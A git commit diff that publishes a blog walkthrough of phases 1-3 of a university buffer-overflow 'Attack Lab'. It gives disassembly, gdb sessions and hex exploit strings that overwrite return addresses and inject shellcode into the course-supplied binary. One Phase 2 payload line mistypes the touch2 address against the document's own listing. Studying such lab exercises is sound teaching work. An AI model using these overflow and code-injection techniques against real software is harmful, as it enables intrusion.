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authorNavan Chauhan <navanchauhan@gmail.com>2023-10-17 14:53:15 -0600
committerNavan Chauhan <navanchauhan@gmail.com>2023-10-17 14:53:15 -0600
commit97188a509f922d4d70733c903558992488358f62 (patch)
tree7bb5b3b21f5ddf459e9ecc8c7395cd87fead05cf /Content
parent29a55c75b706c10f9574cccd9a99da055360ad3e (diff)
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@@ -1 +1 @@
-# 👋 Hi!
+# Navan Chauhan
diff --git a/Content/posts/2023-10-05-attack-lab.md b/Content/posts/2023-10-05-attack-lab.md
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--- a/Content/posts/2023-10-05-attack-lab.md
+++ b/Content/posts/2023-10-05-attack-lab.md
@@ -1,8 +1,8 @@
---
date: 2023-10-05 20:01
-description: Walkthrough of Attack Lab for CSCI 2400 Computer Systems
+description: Walkthrough of Attack Lab Phases 1-3 for CSCI 2400 Computer Systems
tags: gdb, reverse-engineering, c++, csci2400, assembly
-draft: true
+draft: false
---
# Attack Lab
@@ -20,3 +20,296 @@ Again, I like using objdump to disassemble the code.
## Phase 1
From the instructions, we know that our task is to get `CTARGET` to execute the code for `touch1` when `getbuf` executes its return statement, rather than returning to `test`
+
+Let us try to look into the `getbuf` from our disassembled code.
+
+```
+0000000000402608 <getbuf>:
+ 402608: 48 83 ec 18 sub $0x18,%rsp
+ 40260c: 48 89 e7 mov %rsp,%rdi
+ 40260f: e8 95 02 00 00 call 4028a9 <Gets>
+ 402614: b8 01 00 00 00 mov $0x1,%eax
+ 402619: 48 83 c4 18 add $0x18,%rsp
+ 40261d: c3
+```
+
+```
+402608: 48 83 ec 18 sub $0x18,%rsp
+```
+
+We can see that `0x18` (hex) or `24` (decimal) bytes of buffer is allocated to `getbuf` (Since, 24 bytes are being subtracted from the stack pointer).
+
+
+Now, since we know the buffer size we can try passing the address of the touch1 function.
+
+```
+jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1
+000000000040261e <touch1>:
+```
+
+We were told in our recitation that our system was little-endian (so the bytes will be in the reverse order). Otherwise, we can use python to check:
+
+```
+jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)'
+little
+```
+
+We have our padding size and the function we need to call, we can write it in `ctarget.l1.txt`
+
+```
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+1e 26 40 00 00 00 00 00
+```
+
+```
+jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget
+Cookie: 0x3e8dee8f
+Type string:Touch1!: You called touch1()
+Valid solution for level 1 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
+```
+
+## Phase 2
+
+> Phase 2 involves injecting a small amount of code as part of your exploit string.
+
+> Within the file ctarget there is code for a function touch2 having the following C representation:
+
+```c
+void touch2(unsigned val)
+{
+ vlevel = 2;
+ if (val == cookie) {
+ printf("Touch2!: You called touch2(0x%.8x)\n", val);
+ validate(2);
+ } else {
+ printf("Misfire: You called touch2(0x%.8x)\n", val);
+ fail(2);
+ }
+ exit(0);
+}
+```
+
+> Your task is to get CTARGET to execute the code for touch2 rather than returning to test. In this case,
+however, you must make it appear to touch2 as if you have passed your cookie as its argument.
+
+> Recall that the first argument to a function is passed in register %rdi
+
+This hint tells us that we need to store the cookie in the rdi register
+
+```
+movq $0x3e8dee8f,%rdi
+retq
+```
+
+To get the byte representation, we need to compile the code and then disassemble it.
+
+```
+jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o
+phase2.s: Assembler messages:
+phase2.s: Warning: end of file not at end of a line; newline inserted
+
+phase2.o: file format elf64-x86-64
+
+
+Disassembly of section .text:
+
+0000000000000000 <.text>:
+ 0: 48 c7 c7 8f ee 8d 3e mov $0x3e8dee8f,%rdi
+ 7: c3 ret
+```
+
+Thus, the byte representation for our asm code is `48 c7 c7 8f ee 8d 3e c3`
+
+We also need to figure out the address to the `%rsp` register. Again, looking at the `getbuf` code
+
+```
+0000000000402608 <getbuf>:
+ 402608: 48 83 ec 18 sub $0x18,%rsp
+ 40260c: 48 89 e7 mov %rsp,%rdi
+ 40260f: e8 95 02 00 00 call 4028a9 <Gets>
+ 402614: b8 01 00 00 00 mov $0x1,%eax
+ 402619: 48 83 c4 18 add $0x18,%rsp
+ 40261d: c3 ret
+```
+
+We need to find the address of `%rsp` after calling `<Gets>` and sending a really long string.
+
+What we are going to do now is to add a break on `getbuf`, and run the program just after it asks us to enter a string and then find the address of `%rsp`
+
+```
+jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget
+GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
+Copyright (C) 2022 Free Software Foundation, Inc.
+License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
+This is free software: you are free to change and redistribute it.
+There is NO WARRANTY, to the extent permitted by law.
+Type "show copying" and "show warranty" for details.
+This GDB was configured as "x86_64-linux-gnu".
+Type "show configuration" for configuration details.
+For bug reporting instructions, please see:
+<https://www.gnu.org/software/gdb/bugs/>.
+Find the GDB manual and other documentation resources online at:
+ <http://www.gnu.org/software/gdb/documentation/>.
+
+For help, type "help".
+Type "apropos word" to search for commands related to "word"...
+Reading symbols from ./ctarget...
+(gdb) b getbuf
+Breakpoint 1 at 0x402608: file buf.c, line 12.
+(gdb) run
+Starting program: /home/jxxxxn/lab3-attacklab-naxxxan/target66/ctarget
+Cookie: 0x3e8dee8f
+
+Breakpoint 1, getbuf () at buf.c:12
+12 buf.c: No such file or directory.
+(gdb) disas
+Dump of assembler code for function getbuf:
+=> 0x0000000000402608 <+0>: sub $0x18,%rsp
+ 0x000000000040260c <+4>: mov %rsp,%rdi
+ 0x000000000040260f <+7>: call 0x4028a9 <Gets>
+ 0x0000000000402614 <+12>: mov $0x1,%eax
+ 0x0000000000402619 <+17>: add $0x18,%rsp
+ 0x000000000040261d <+21>: ret
+End of assembler dump.
+(gdb) until *0x402614
+Type string:fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe
+getbuf () at buf.c:15
+15 in buf.c
+(gdb) x/s $rsp
+0x55621b40: "fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe"
+(gdb)
+```
+
+So, the address for `%rsp` is `0x55621b40`
+
+Thus, we can set our `ctarget.l2.txt` as:
+
+```
+byte representation of ASM code
+padding
+address of %rsp
+address of touch2 function
+```
+
+To get the address of `touch2` we can run:
+
+```
+jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2
+000000000040264e <touch2>:
+ 402666: 74 2a je 402692 <touch2+0x44>
+ 4026b2: eb d4 jmp 402688 <touch2+0x3a>
+```
+
+```
+48 c7 c7 8f ee 8d 3e c3
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+40 1b 62 55 00 00 00 00
+4e 26 b2 00 00 00 00 00
+```
+
+Do note that our required padding is 24 bytes, we are only adding 16 bytes because our asm code is 8 bytes on its own. Our goal is to have a total of 24 bytes in padding, not 8 + 24 bytes,
+
+```
+joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget
+Cookie: 0x3e8dee8f
+Type string:Touch2!: You called touch2(0x3e8dee8f)
+Valid solution for level 2 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
+```
+
+## Phase 3
+
+> Phase 3 also involves a code injection attack, but passing a string as argument.
+
+> You will need to include a string representation of your cookie in your exploit string. The string should
+consist of the eight hexadecimal digits (ordered from most to least significant) without a leading “0x.”
+
+> Your injected code should set register %rdi to the address of this string
+
+> When functions hexmatch and strncmp are called, they push data onto the stack, overwriting
+portions of memory that held the buffer used by getbuf. As a result, you will need to be careful
+where you place the string representation of your cookie.
+
+Because `hexmatch` and `strncmp` might overwrite the buffer allocated for `getbuf` we will try to store the data after the function `touch3` itself.
+
+=> The total bytes before the cookie = Buffer (0x18 in our case) + Return Address of %rsp (8 bytes) + Touch 3 (8 Bytes) = 0x18 + 8 + 8 = 28 (hex)
+
+We can use our address for `%rsp` from phase 2, and simply add `0x28` to it.
+
+=> `0x55621b40` + `0x28` = `0x55621B68`
+
+Again, let us get the binary representation for the ASM code:
+
+```asm
+movq $0x55621B68, %rdi
+retq
+```
+
+```
+jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o
+phase3.s: Assembler messages:
+phase3.s: Warning: end of file not at end of a line; newline inserted
+
+phase3.o: file format elf64-x86-64
+
+
+Disassembly of section .text:
+
+0000000000000000 <.text>:
+ 0: 48 c7 c7 68 1b 62 55 mov $0x55621b68,%rdi
+ 7: c3 ret
+```
+
+Thus, our answer is going to be in the form:
+
+```
+asm code
+padding
+return address / %rsp
+touch3 address
+cookie string
+```
+
+To quickly get the address for `touch3`
+
+```
+jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3
+0000000000402763 <touch3>:
+ 402781: 74 2d je 4027b0 <touch3+0x4d>
+ 4027d3: eb d1 jmp 4027a6 <touch3+0x43>
+```
+
+We need to use an ASCII to Hex converter to convert the cookie string into hex.
+
+```
+jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p
+3365386465653866
+```
+
+Thus, our cookie string representation is `33 65 38 64 65 65 38 66`
+
+```
+48 c7 c7 68 1B 62 55 c3
+00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00
+40 1b 62 55 00 00 00 00
+63 27 40 00 00 00 00 00
+33 65 38 64 65 65 38 66
+```
+
+```
+jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget
+Cookie: 0x3e8dee8f
+Type string:Touch3!: You called touch3("3e8dee8f")
+Valid solution for level 3 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
+```
+
+Phases 1-3 Complete.